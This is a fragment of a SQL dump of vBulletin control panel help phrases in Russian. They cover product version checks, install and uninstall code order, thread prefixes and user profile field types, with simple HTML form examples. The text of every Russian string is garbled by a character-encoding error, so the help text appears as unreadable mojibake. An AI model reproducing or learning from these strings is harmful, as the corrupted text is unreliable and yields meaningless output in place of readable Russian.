(23668, -1, 'plugin_productadd_productedit_version_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå ìîãóò îòîáðà æà òüñÿ äâå âåðñèè. \r\n \r\nÂåðñèÿ ïðîäóêòà \r\nÃòî òåêóùà ÿ âåðñèÿ âà øåãî ïðîäóêòà . ÃÃ¥ çà áûâà éòå óâåëè÷èâà òü ýòî ÷èñëî, åñëè âû âÃîñèòå èçìåÃÃ¥Ãèÿ â ñâîé ïðîäóêò, ïîòîìó ÷òî êîäû óñòà Ãîâêè ìîãóò ñðà áîòà òü ÃåâåðÃî, äà è ïîëüçîâà òåëè ñðà çó áóäóò âèäåòü, ÷òî îÃè ñêà ÷à ëè âåðñèþ Ãîâåå, ÷åì ó Ãèõ ñåé÷à ñ. \r\n \r\nÂåðñèÿ êîäà óñòà Ãîâêè/óäà ëåÃèÿ \r\nÃòî âåðñèÿ êîäà óñòà Ãîâêè/óäà ëåÃèÿ, êîòîðûé ñîîòâåòñòâóåò âåðñèè ïðîäóêòà . Êîãäà âû âûïóñêà åòå ïðîäóêò, òðåáóþùèé êîäà óñòà Ãîâêè/óäà ëåÃèÿ, òî âà ì ñëåäóåò ñîïîñòà âèòü åãî âåðñèþ ïåðâîé âåðñèè ïðîäóêòà , êîòîðîé òðåáóåòñÿ äà ÃÃûé êîä.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23669, -1, 'plugin_productadd_productedit_version_title', 'cphelptext', 'Âåðñèÿ ïðîäóêòà ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23670, -1, 'plugin_productadd_productedit_description_text', 'cphelptext', 'Êðà òêîå îïèñà Ãèå ïðîäóêòà . Îòîáðà æà åòñÿ ïîëüçîâà òåëþ ïðè ïðîñìîòðå ñïèñêà óñòà ÃîâëåÃÃûõ ïðîäóêòîâ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23671, -1, 'plugin_productadd_productedit_description_title', 'cphelptext', 'Îïèñà Ãèå ïðîäóêòà ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23672, -1, 'plugin_productadd_productedit_url_text', 'cphelptext', 'Ññûëêà , ïðîéäÿ ïî êîòîðîé, ïîëüçîâà òåëè óçÃà þò áîëüøå èÃôîðìà öèè î äà ÃÃîì ïðîäóêòå. Åñëè îÃà óêà çà Ãà , òî èìÿ ïðîäóêòà â ñïèñêå óñòà ÃîâëåÃÃûõ ïðîäóêòîâ áóäåò âåñòè Ãà óêà çà ÃÃûé çäåñü à äðåñ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23673, -1, 'plugin_productadd_productedit_url_title', 'cphelptext', 'Ññûëêà Ãà ïðîäóêò', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23674, -1, 'plugin_productadd_productedit_versioncheckurl_text', 'cphelptext', 'Çäåñü âû ìîæåòå óêà çà òü ññûëêó, ïî êîòîðîé áóäåò ïðîâåðÿòüñÿ Ãà ëè÷èå Ãîâîé âåðñèè âà øåãî ïðîäóêòà . Âû ìîæåòå óêà çà òü ëþáîé à äðåñ, Ãî äà ÃÃûå, Ãà õîäÿùèåñÿ ïî ýòîìó à äðåñó, äîëæÃû áûòü â îïðåäåë¸ÃÃîì ôîðìà òå: \r\n \r\n\r\n<version productid=\"x \">1.2.3 </version> \r\n\r\nx âû äîëæÃû çà ìåÃèòü èäåÃòèôèêà òîðîì âà øåãî ïðîäóêòà . À 1.2.3 âû äîëæÃû çà ìåÃèòü ïîñëåäÃåé âåðñèåé ïðîäóêòà . \r\n \r\nÃîìÃèòå: ñåðâåð äîëæåà ïîääåðæèâà òü âÃåøÃèå POST çà ïðîñû. Ãåêîòîðûå êîÃôèãóðà öèè ñåðâåðîâ ìîãóò çà ïðåùà òü òà êèå çà ïðîñû ê ñòà òè÷åñêèì ôà éëà ì, ïîýòîìó âà ì ñëåäóåò èñïîëüçîâà òü PHP äëÿ ïåðåäà ÷è äà ÃÃûõ.', 'vbulletin', 'zCarot', 1213695534, '3.8.0 Alpha 1'),
(23675, -1, 'plugin_productadd_productedit_versioncheckurl_title', 'cphelptext', 'Ññûëêà äëÿ ïðîâåðêè Ãà Ãà ëè÷èå Ãîâîé âåðñèè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23676, -1, 'plugin_productedit_dependencytype_text', 'cphelptext', 'Ñèñòåìà çà âèñèìîñòåé ïðîäóêòà ïîçâîëÿåò âà ì îïðåäåëèòü Ãåêîòîðûå ñèñòåìÃûå çà âèñèìîñòè äëÿ âà øåãî ïðîäóêòà . Åñëè ñèñòåìà ÃÃ¥ óäîâëåòâîðÿåò õîòÿ áû îäÃîé èç çà âèñèìîñòåé, òî Ãà Ãå¸ ÃåâîçìîæÃî áóäåò óñòà Ãîâèòü äà ÃÃûé ïðîäóêò. \r\n \r\nÃòà îïöèÿ îïðåäåëÿåò òèï çà âèñèìîñòè. Âû ìîæåòå âûáðà òü çà âèñèìîñòü îò:\r\n\r\nÂåðñèè PHP \r\nÂåðñèè MySQL \r\nÂåðñèè ôîðóìà \r\nÈäåÃòèôèêà òîðà ïðîäóêòà - ýòà îïöèÿ ïîçâîëÿåò âà ì óêà çà òü èäåÃòèôèêà òîð äðóãîãî ïðîäóêòà , êîòîðûé äîëæåà áûòü óñòà Ãîâëåà è âêëþ÷åà äî óñòà Ãîâêè äà ÃÃîãî ïðîäóêòà \r\n \r\n\r\nÈñïîëüçóéòå ïà ðà ìåòðû \"Ñîâìåñòèì ñ âåðñèåé ñòà ðøå\" è \"ÃÃ¥ ñîâìåñòèì ñ âåðñèåé\" , ÷òîáû çà äà òü ïðîìåæóòîê âåðñèé, êîòîðûå ñîâìåñòèìû ñ äà ÃÃûì ïðîäóêòîì. \r\n \r\nÃîìÃèòå: . Åñëè âû óêà æèòå ÃÃ¥ ñîâìåñòÃûå ïðîìåæóòêè âåðñèé, òî ñèñòåìà äîëæÃà áóäåò óäîâëåòâîðÿòü õîòÿ áû îäÃîìó èç Ãèõ. Ãà ïðèìåð, åñëè âû òðåáóåòå âåðñèþ PHP Ãèæå, ÷åì 4.2.0, èëè âåðñèþ PHP âûøå èëè ðà âÃóþ 4.3.0, òî ïðè óñòà Ãîâêå ìîæÃî áóäåò èñïîëüçîâà òü ñèñòåìû ñ âåðñèåé PHP êà ê Ãèæå 4.2.0, òà ê è âûøå èëè ðà âÃîé 4.3.0.', 'vbulletin', 'zCarot', 1153746182, '3.6.0 Release Candidate 3'),
(23677, -1, 'plugin_productedit_dependencytype_title', 'cphelptext', 'Òèï çà âèñèìîñòè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23678, -1, 'plugin_productedit_maxversion_text', 'cphelptext', 'Ãåðâà ÿ âåðñèÿ, ñ êîòîðîé óæå ÃÃ¥ ñîâìåñòèì äà ÃÃûé ïðîäóêò. Ãîâåéøèå âåðñèè áóäóò òà êæå ÃÃ¥ ñîâìåñòèìû. Åñëè âû æåëà åòå óêà çà òü òîëüêî âåðñèè Ãèæå îïðåäåë¸ÃÃîé, òî ïðîïóñòèòå äà ÃÃîå ïîëå. \r\n \r\nÃà ïðèìåð, åñëè âû óêà æèòå, ÷òî äà ÃÃûé ïðîäóêò ÃÃ¥ ñîâìåñòèì ñ PHP 5.0.0, òî ïîëüçîâà òåëü, èñïîëüçóþùèé PHP 5.0.0 Beta 1, ñìîæåò óñòà Ãîâèòü åãî, à ïîëüçîâà òåëü ñ âåðñèåé PHP 5.0.0 èëè 5.0.1 ÃÃ¥ ñìîæåò.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23679, -1, 'plugin_productedit_maxversion_title', 'cphelptext', 'ÃÃ¥ ñîâìåñòèì ñ âåðñèåé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23680, -1, 'plugin_productedit_minversion_text', 'cphelptext', 'Îïðåäåëÿåò, êà êèå âåðñèè åù¸ ÃÃ¥ ïîääåðæèâà þò äà ÃÃûé ïðîäóêò. Âû ìîæåòå ïðîïóñòèòü ýòî ïîëå, åñëè ñ÷èòà åòå, ÷òî ëþáûå ñòà ðûå âåðñèè áóäóò åãî ïîääåðæèâà òü. \r\n \r\nÃà ïðèìåð, åñëè âû óêà æèòå çäåñü PHP 5.0.0, òî Ãà ñåðâåðå ñ óñòà ÃîâëåÃÃûì PHP 5.0.0 ïðîäóêò áóäåò óñòà ÃîâëåÃ, îäÃà êî, Ãà 5.0.0 Beta 1 ïîëüçîâà òåëü ÃÃ¥ ñìîæåò åãî óñòà Ãîâèòü.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23681, -1, 'plugin_productedit_minversion_title', 'cphelptext', 'Ñîâìåñòèì ñ âåðñèåé ñòà ðøå', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23682, -1, 'plugin_productedit_installcode_text', 'cphelptext', 'Ãòîò êîä áóäåò âûïîëÃÿòüñÿ ïðè óñòà Ãîâêå äà ÃÃîãî ïðîäóêòà . \r\n \r\nÄà ÃÃûé êîä áóäåò âûïîëÃÿòüñÿ, òîëüêî åñëè óñòà ÃîâëåÃà âåðñèÿ ïðîäóêòà Ãèæå óêà çà ÃÃîé. Ãà ïðèìåð, åñëè âû âûáåðèòå âåðñèþ 1.0, òî ïðè óñòà Ãîâêå ïîëüçîâà òåëåì âà øåãî ïðîäóêòà â ïåðâûé ðà ç - êîä âûïîëÃèòñÿ. Åñëè æå îà áóäåò îáÃîâëÿòüñÿ ñ âåðñèè 1.0 äî 1.1, òî êîä, ñîîòâåòñòâóþùèé âåðñèè 1.0, ÃÃ¥ áóäåò âûïîëÃÿòüñÿ. \r\n \r\nÃðè ìÃîæåñòâå êîäîâ óñòà Ãîâêè (Ãà ïðèìåð, åñëè ó âà ñ åñòü êîäû óñòà Ãîâêè äëÿ 1.0 è 1.1 è Ãà äà ÃÃûé ôîðóì ïðîäóêò óñòà Ãà âëèâà åòñÿ âïåðâûå) ïåðâûì áóäåò âûïîëÃÿòüñÿ êîä, èìåþùèé áîëåå ñòà ðóþ âåðñèþ: êîä âåðñèè 1.0 áóäåò âûïîëÃåà ïåðåä êîäîì âåðñèè 1.1.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23683, -1, 'plugin_productedit_installcode_title', 'cphelptext', 'Êîä óñòà Ãîâêè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23684, -1, 'plugin_productedit_uninstallcode_text', 'cphelptext', 'Ãòîò êîä áóäåò âûïîëÃÿòüñÿ ïðè óäà ëåÃèè âà øåãî ïðîäóêòà . Êîä áóäåò âûïîëÃÿòüñÿ îò âûñøåé âåðñèè ê Ãèçøåé. Ãà ïðèìåð, åñëè ó âà ñ åñòü êîäû óäà ëåÃèÿ äëÿ âåðñèé 1.0 è 1.1, òî ñÃà ÷à ëà âûïîëÃèòñÿ êîä äëÿ 1.1, à ïîòîì óæå äëÿ 1.0.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23685, -1, 'plugin_productedit_uninstallcode_title', 'cphelptext', 'Êîä óäà ëåÃèÿ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23686, -1, 'prefix_addprefix_editprefix_prefixid_text', 'cphelptext', 'ÓÃèêà ëüÃûé èäåÃòèôèêà òîð äëÿ ýòîãî ïðåôèêñà . Âû ìîæåòå èñïîëüçîâà òü òîëüêî ñèìâîëû A-Z, a-z, 0-9, è _ (ïîä÷¸ðêèâà Ãèå).', 'vbulletin', 'zCarot', 1190106476, '3.7.0 Beta 1'),
(23687, -1, 'prefix_addprefix_editprefix_prefixid_title', 'cphelptext', 'ÈäåÃòèôèêà òîð ïðåôèêñà ', 'vbulletin', 'zCarot', 1190106476, '3.7.0 Beta 1'),
(23688, -1, 'prefix_addprefix_editprefix_prefixsetid_text', 'cphelptext', 'Ãà áîð ïðåôèêñîâ, â êîòîðûé ñëåäóåò ïîìåñòèòü äà ÃÃûé ïðåôèêñ. Ãòîò ïðåôèêñ ìîæÃî áóäåò èñïîëüçîâà òü òîëüêî â ðà çäåëà õ, â êîòîðûõ ðà çðåøåÃî èñïîëüçîâà òü äà ÃÃûé Ãà áîð ïðåôèêñîâ. \r\n \r\nÅñëè âû èçìåÃèòå äà ÃÃûé ïà ðà ìåòð, òî â òåìà õ, êîòîðûå èñïîëüçîâà ëè äà ÃÃûé ïðåôèêñ, à òåïåðü ÃÃ¥ ñìîãóò ýòî ñäåëà òü, ïðåôèêñ áóäåò óäà ë¸Ã!', 'vbulletin', 'zCarot', 1190106571, '3.7.0 Beta 1'),
(23689, -1, 'prefix_addprefix_editprefix_prefixsetid_title', 'cphelptext', 'Ãà áîð ïðåôèêñîâ', 'vbulletin', 'zCarot', 1190106571, '3.7.0 Beta 1'),
(23690, -1, 'prefix_addprefix_editprefix_title_plain_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå ïðåôèêñà áåç îôîðìëåÃèÿ. Òà ê ýòîò ïðåôèêñ áóäåò îòîáðà æà òüñÿ â ìåÃþ âûáîðà ïðåôèêñà èç ñïèñêà , ðÿäîì ñ Ãà çâà Ãèåì òåìû Ãà ïà Ãåëè Ãà âèãà öèè, à òà êæå â ýëåêòðîÃÃûõ ïèñüìà õ. \r\n \r\nÃòî Ãà çâà Ãèå áóäåò ðà çìåùåÃî ïåðåä Ãà çâà Ãèåì òåìû, ðà çäåëÿÿ èõ òîëüêî îäÃèì ïðîáåëîì. ÂîçìîæÃî, âû çà õîòèòå âêëþ÷èòü êà êîé-òî ñèìâîë ðà çäåëåÃèÿ, ÷òîáû áûëî áîëåå ïîÃÿòÃî, ÷òî ýòî èñïîëüçîâà à ïðåôèêñ. Ãà ïðèìåð, åñëè âû äîáà âëÿåòå ïðåôèêñ \"Ãðîäà æà \", òî âû ìîæåòå ââåñòè çäåñü \"Ãðîäà æà :\" èëè \"[Ãðîäà æà ]\".', 'vbulletin', 'zCarot', 1231681195, '3.8.0'),
(23691, -1, 'prefix_addprefix_editprefix_title_plain_title', 'cphelptext', 'Ãà çâà Ãèå (ïðîñòîé òåêñò)', 'vbulletin', 'zCarot', 1190106746, '3.7.0 Beta 1'),
(23692, -1, 'prefix_addprefix_editprefix_title_rich_text', 'cphelptext', 'Ãòî òîæå Ãà çâà Ãèå ïðåôèêñà , Ãî çäåñü âû ìîæåòå èñïîëüçîâà òü HTML êîä äëÿ ôîðìà òèðîâà Ãèÿ Ãà çâà Ãèÿ. Ãà ïðèìåð, âû ìîæåòå ñäåëà òü ïðåôèêñ êðà ñÃûì è æèðÃûì âîò òà ê: <span style=\"color: red\"><b>Ãðîäà æà </b></span> Òîãäà ïðåôèêñ áóäåò âûãëÿäåòü âîò òà ê: Ãðîäà æà . \r\n \r\nÃðåôèêñ áóäåò îòîáðà æà òüñÿ èìåÃÃî òà ê â ñïèñêå òåì è âÃóòðè ñà ìîé òåìû.', 'vbulletin', 'zCarot', 1190107051, '3.7.0 Beta 1'),
(23693, -1, 'prefix_addprefix_editprefix_title_rich_title', 'cphelptext', 'Ãà çâà Ãèå (ôîðìà òèðîâà ÃÃûé òåêñò)', 'vbulletin', 'zCarot', 1190106949, '3.7.0 Beta 1'),
(23694, -1, 'prefix_addprefix_editprefix_displayorder_text', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ýòîãî ïðåôèêñà . Ãåðâûìè îòîáðà æà þòñÿ ïðåôèêñû ñ áîëåå Ãèçêèìè ïîðÿäêà ìè îòîáðà æåÃèÿ.', 'vbulletin', 'zCarot', 1190108080, '3.7.0 Beta 1'),
(23695, -1, 'prefix_addprefix_editprefix_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1190108080, '3.7.0 Beta 1'),
(23696, -1, 'prefix_addset_editset_prefixsetid_text', 'cphelptext', 'ÓÃèêà ëüÃûé èäåÃòèôèêà òîð äëÿ ýòîãî Ãà áîðà ïðåôèêñîâ. Âû ìîæåòå èñïîëüçîâà òü òîëüêî ñèìâîëû A-Z, a-z, 0-9, è _ (ïîä÷¸ðêèâà Ãèå).', 'vbulletin', 'zCarot', 1190047397, '3.7.0 Beta 1'),
(23697, -1, 'prefix_addset_editset_prefixsetid_title', 'cphelptext', 'ÈäåÃòèôèêà òîð Ãà áîðà ïðåôèêñîâ', 'vbulletin', 'zCarot', 1190047397, '3.7.0 Beta 1'),
(23698, -1, 'prefix_addset_editset_title_text', 'cphelptext', 'Çà ãîëîâîê (Ãà çâà Ãèå) ýòîãî Ãà áîðà ïðåôèêñîâ. Âà ì ÃÃ¥ ñëåäóåò èñïîëüçîâà òü êà êîé-ëèáî HTML êîä çäåñü.', 'vbulletin', 'zCarot', 1190047489, '3.7.0 Beta 1'),
(23699, -1, 'prefix_addset_editset_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', 'zCarot', 1190047489, '3.7.0 Beta 1'),
(23700, -1, 'prefix_addset_editset_forumids_text', 'cphelptext', 'Ãà áîðû ïðåôèêñîâ ìîæÃî îãðà Ãè÷èòü èñïîëüçîâà Ãèåì ëèøü â îïðåäåë¸ÃÃûõ ðà çäåëà õ. Âûáåðèòå îäèà èëè Ãåñêîëüêî ðà çäåëîâ, â êîòîðûõ ñëåäóåò èñïîëüçîâà òü äà ÃÃûé Ãà áîð ïðåôèêñîâ. Êîãäà ïîëüçîâà òåëü áóäåò ñîçäà âà òü Ãîâóþ òåìó â âûáðà ÃÃîì âà ìè çäåñü ðà çäåëå, îà ñìîæåò âûáðà òü îäèà èç ïðåôèêñîâ èç äà ÃÃîãî Ãà áîðà äëÿ ñâîåé òåìû.', 'vbulletin', 'zCarot', 1190048861, '3.7.0 Beta 1'),
(23701, -1, 'prefix_addset_editset_forumids_title', 'cphelptext', 'Èñïîëüçîâà òü Ãà áîð ïðåôèêñîâ â ýòèõ ðà çäåëà õ', 'vbulletin', 'zCarot', 1190048861, '3.7.0 Beta 1'),
(23702, -1, 'prefix_addset_editset_displayorder_text', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ Ãà áîðà ïðåôèêñîâ. Ãåðâûìè îòîáðà æà þòñÿ Ãà áîðû ïðåôèêñîâ ñ áîëåå Ãèçêèìè ïîðÿäêà ìè îòîáðà æåÃèÿ. \r\n \r\nÃîìÃèòå, ÷òî ïîðÿäîê îòîáðà æåÃèÿ ñà ìèõ ïðåôèêñîâ îïðåäåëÿåò èõ ïîðÿäîê òîëüêî âÃóòðè îäÃîãî Ãà áîðà ïðåôèêñîâ.', 'vbulletin', 'zCarot', 1190047556, '3.7.0 Beta 1'),
(23703, -1, 'prefix_addset_editset_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1190047556, '3.7.0 Beta 1'),
(23704, -1, 'prefix_list_text', 'cphelptext', 'Ãðåôèêñû òåì ÿâëÿþòñÿ îäÃèì èç ñïîñîáîâ ñòðóêòóðèðîâà Ãèÿ òåì, îáñóæäà åìûõ âÃóòðè ðà çäåëà . Âû ìîæåòå ñîçäà òü Ãà áîð ïðåôèêñîâ, ñîäåðæà ùèå ìÃîæåñòâî ïðåôèêñîâ, è ðà çðåøèòü èñïîëüçîâà Ãèå Ãà áîðà âÃóòðè îäÃîãî èëè Ãåñêîëüêèõ ðà çäåëîâ. \r\n \r\nÊîãäà ïîëüçîâà òåëü ñîçäà ¸ò òåìó, îÃ(à ) ñìîæåò âûáðà òü ïðåôèêñ äëÿ òåìû. Ãðè îòîáðà æåÃèè ñïèñêà òåì ìîæÃî îòôèëüòðîâà òü òåìû ïî îïðåäåë¸ÃÃîìó ïðåôèêñó. \r\n \r\nÃà ïðèìåð, âû ìîæåòå óêà çà òü èñïîëüçîâà Ãèå ïðåôèêñîâ â ðà çäåëå \"ðûÃîê\", ãäå ëþäè ñîçäà þò òåìû, êîòîðûå óñëîâÃî ìîæÃî ðà çäåëèòü Ãà òðè êà òåãîðèè: \"Ãîêóïêà \", \"Ãðîäà æà \" è \"ÎáìåÃ\". Äðóãîé ïðèìåð: åñëè âû ðà çðà áîò÷èê è âûïóñêà åòå ìÃîæåñòâî ïðîäóêòîâ, Ãî ïðè ýòîì èìååòå ëèøü îäèà ðà çäåë ñ îáúÿâëåÃèÿìè î Ãîâûõ âåðñèÿõ, òî âû ìîæåòå èñïîëüçîâà òü ïðåôèêñû â êà ÷åñòâå óêà çà òåëÿ Ãà ïðîäóêò.', 'vbulletin', 'zCarot', 1190108556, '3.7.0 Beta 1'),
(23705, -1, 'prefix_list_title', 'cphelptext', 'Î ïðåôèêñà õ òåì', 'vbulletin', 'zCarot', 1190108556, '3.7.0 Beta 1'),
(23706, -1, 'profilefield_text', 'cphelptext', 'Ãîëÿ ïðîôèëÿ ïîëüçîâà òåëåé: \r\nÓ ïîëåé ïðîôèëåé ïîëüçîâà òåëåé åñòü äâà ãëà âÃûõ ïðèìåÃÃ¥Ãèÿ. Ãåðâîå - îÃè ìîãóò áûòü èñïîëüçîâà Ãû äëÿ õðà ÃÃ¥Ãèÿ èÃôîðìà öèè î âà øèõ ïîëüçîâà òåëÿõ. Ãà ïðèìåð, ïî óìîë÷à Ãèþ â ôîðóìå åñòü ïîëå ïðîôèëÿ \"ÌåñòîïîëîæåÃèå\", ãäå ïîëüçîâà òåëè ìîãóò ââåñòè èõ ìåñòîïîëîæåÃèå. Âòîðîå - ïîëÿ ïðîôèëÿ ìîãóò áûòü èñïîëüçîâà Ãû êà ê îñÃîâÃûå Ãà ñòðîéêè, ÷òîáû óïðà âëÿòü óñëîâèÿìè â âà øèõ øà áëîÃà õ. Ãòî ïðèìåÃÃ¥Ãèå îáúÿñÃÿåòñÿ çäåñü . \r\n\r\nÅñòü ðà çÃûå òèïû ïîëåé ïðîôèëÿ, êîòîðûå ìîãóò áûòü âûáðà Ãû ïðè ñîçäà Ãèè Ãîâîãî ïîëÿ ïðîôèëÿ Ãà ñòðà Ãèöå Äîáà âëåÃèå ïîëÿ ïðîôèëÿ ïîëüçîâà òåëÿ . Ãèæå Ãà õîäÿòñÿ ïðèìåðû âñåõ òèïîâ ïîëåé ïðîôèëÿ: \r\n\r\nÒåêñòîâîå ïîëå îäÃîé ñòðîêîé (ââîäà ) :  HTML, ýòî \r\n<input type=\"text\" name=\"\" /> \r\n÷òî ðà âÃîñèëüÃî ýòîìó: \r\n \r\n\r\nÃŒÃîãîñòðî÷Ãîå òåêñòîâîå ïîëå :  HTML, ýòî \r\n<textarea name=\"\"></textarea> \r\n÷òî ðà âÃîñèëüÃî ýòîìó: \r\n \r\n\r\nÃåðåêëþ÷à òåëè ñ âûáîðîì îäÃîãî :  HTML, ýòî \r\n<input type=\"radio\" name=\"a\" /> Îïöèÿ 1 \r\n<input type=\"radio\" name=\"a\" /> Îïöèÿ 2 \r\n÷òî ðà âÃîñèëüÃî ýòîìó: \r\n Îïöèÿ 1 \r\n Îïöèÿ 2 \r\n\r\nÌåÃþ ñ âûáîðîì îäÃîãî (âûáîðà ) :  HTML, ýòî \r\n<select name=\"sel\"> \r\n<option value=\"1\">Îïöèÿ 1<option> \r\n<option value=\"2\">Îïöèÿ 2<option> \r\n</select> \r\n÷òî ðà âÃîñèëüÃî ýòîìó: \r\n\r\nÎïöèÿ 1 \r\nÎïöèÿ 2 \r\n \r\n\r\nÌåÃþ ñ âûáîðîì Ãåñêîëüêèõ :  HTML, ýòî \r\n<select name=\"sel\" multiple=\"multiple\" size=\"3\"> \r\n<option value=\"1\">Îïöèÿ 1</option> \r\n<option value=\"2\">Îïöèÿ 2</option> \r\n<option value=\"3\">Îïöèÿ 3</option> \r\n<option value=\"4\">Îïöèÿ 4</option> \r\n<option value=\"5\">Îïöèÿ 5</option> \r\n</select> \r\n÷òî ðà âÃîñèëüÃî ýòîìó: \r\n\r\nÎïöèÿ 1 \r\nÎïöèÿ 2 \r\nÎïöèÿ 3 \r\nÎïöèÿ 4 \r\nÎïöèÿ 5 \r\n \r\n\r\nÔëà æêè (checkboxes) ñ âîçìîæÃîñòüþ âûáîðà Ãåñêîëüêèõ :  HTML, ýòî \r\n<input type=\"checkbox\" name=\"name\" value=\"1\" /> Îïöèÿ 1 \r\n<input type=\"checkbox\" name=\"name\" value=\"2\" /> Îïöèÿ 2 \r\n÷òî ðà âÃîñèëüÃî ýòîìó: \r\n Îïöèÿ 1 \r\n Îïöèÿ 2 ', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(23707, -1, 'profilefield_title', 'cphelptext', 'Î ïîëÿõ ïðîôèëÿ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23708, -1, 'profilefield_add_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå äîáà âèòü ïîëå ïðîôèëÿ ïîëüçîâà òåëÿ. Ãîëå ïðîôèëÿ ïîëüçîâà òåëÿ - ýòî ïîëå, êîòîðîå çà ïîëÃÿåò ïîëüçîâà òåëü ïðè ðåãèñòðà öèè (èëè ïîñëå, ïðè ðåäà êòèðîâà Ãèè ïðîôèëÿ), à çà òåì çÃà ÷åÃèå îòîáðà æà åòñÿ â ðà çëè÷Ãûõ ìåñòà õ.', 'vbulletin', '', 0, ''),
(23709, -1, 'profilefield_add_title', 'cphelptext', 'Äîáà âëåÃèå ïîëÿ ïðîôèëÿ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(23710, -1, 'profilefield_add_profilefieldtype_text', 'cphelptext', 'Îïðåäåëÿåò, êà êîé òèï ýëåìåÃòîâ HTML áóäåò èñïîëüçîâà òüñÿ äëÿ óêà çà Ãèÿ çÃà ÷åÃèÿ äëÿ ýòîãî ïîëÿ.', 'vbulletin', 'zCarot', 1220959801, '3.8.0 Alpha 1'),
(23711, -1, 'profilefield_add_profilefieldtype_title', 'cphelptext', 'Òèï ïîëÿ ïðîôèëÿ', 'vbulletin', 'zCarot', 1220959801, '3.8.0 Alpha 1'),
(23712, -1, 'profilefield_add_edit_title_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå ïîëÿ ïðîôèëÿ, êîòîðîå îòîáðà æà åòñÿ ïîëüçîâà òåëÿì è â ïà Ãåëè à äìèÃèñòðà òîðà . ÄëèÃà çà ãîëîâêà ìîæåò áûòü äî 50 ñèìâîëîâ.', 'vbulletin', '', 0, ''),
(23713, -1, 'profilefield_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(23714, -1, 'profilefield_add_edit_description_text', 'cphelptext', 'Ãòî îïèñà Ãèå ïîëÿ, îòîáðà æà åìîãî ïîëüçîâà òåëÿì. Âà ì ñëåäóåò îïèñà òü, äëÿ ÷åãî îÃî òðåáóåòñÿ, îáÿçà òåëüÃîå ýòî ïîëå èëè Ãåò, ëè÷Ãîå èëè Ãåò.', 'vbulletin', '', 0, ''),
(23715, -1, 'profilefield_add_edit_description_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', '', 0, ''),
(23716, -1, 'profilefield_add_edit_profilefieldcategoryid_text', 'cphelptext', 'Âû ìîæåòå ãðóïïèðîâà òü äîïîëÃèòåëüÃûå ïîëÿ ïðîôèëÿ ïî êà òåãîðèÿì. ÎñÃîâÃà ÿ öåëü ãðóïïèðîâêè - îòîáðà æåÃèå ïóÃêòîâ â ðà çÃûõ âêëà äêà õ èëè áëîêà õ â ïðîôèëå (â äîïîëÃÃ¥Ãèè ê îòîáðà æåÃèþ âî âêëà äêå \"Îáî ìÃÃ¥\"). \r\n \r\n×òîáû óçÃà òü îá ýòîì áîëüøå, ïî÷èòà éòå ïîìîùü ïî óïðà âëåÃèþ êà òåãîðèÿìè ïîëåé ïðîôèëÿ. ', 'vbulletin', 'zCarot', 1205937526, '3.7.0 Release Candidate 1'),
(23717, -1, 'profilefield_add_edit_profilefieldcategoryid_title', 'cphelptext', 'Êà òåãîðèÿ ïîëÿ ïðîôèëÿ', 'vbulletin', 'zCarot', 1205937422, '3.7.0 Release Candidate 1'),
(23718, -1, 'profilefield_add_edit_data_text', 'cphelptext', 'Ãîëÿ äëÿ âûáîðà \r\nÑþäà ñëåäóåò ââåñòè êà æäîå çÃà ÷åÃèå, êîòîðîå äîëæÃî ïîÿâëÿòüñÿ êà ê îïöèÿ. Óáåäèòåñü, ÷òî Ãà æà ëè êëà âèøó \'Enter\' ïîñëå êà æäîé îïöèè, èëè ýòî áóäåò Ãåïðà âèëüÃî ðà áîòà òü! \r\n \r\nÃîëÿ äëÿ ïåðåêëþ÷à òåëåé \r\nÑþäà ñëåäóåò ââåñòè êà æäîå çÃà ÷åÃèå, êîòîðîå äîëæÃî ïîÿâëÿòüñÿ êà ê ïåðåêëþ÷à òåëü. Óáåäèòåñü, ÷òî Ãà æà ëè êëà âèøó \'Enter\' ïîñëå êà æäîé îïöèè, èëè ýòî áóäåò Ãåïðà âèëüÃî ðà áîòà òü! \r\n \r\nÃîëÿ äëÿ ôëà æêîâ (checkboxes) \r\nÑþäà ñëåäóåò ââåñòè êà æäîå çÃà ÷åÃèå, êîòîðîå äîëæÃî ïîÿâëÿòüñÿ êà ê ôëà æîê. Óáåäèòåñü, ÷òî Ãà æà ëè êëà âèøó \'Enter\' ïîñëå êà æäîé îïöèè, èëè ýòî áóäåò Ãåïðà âèëüÃî ðà áîòà òü!!', 'vbulletin', '', 0, ''),
(23719, -1, 'profilefield_add_edit_data_title', 'cphelptext', 'Ãîëÿ ñ âîçìîæÃîñòüþ âûáîðà Ãåñêîëüêèõ', 'vbulletin', '', 0, ''),
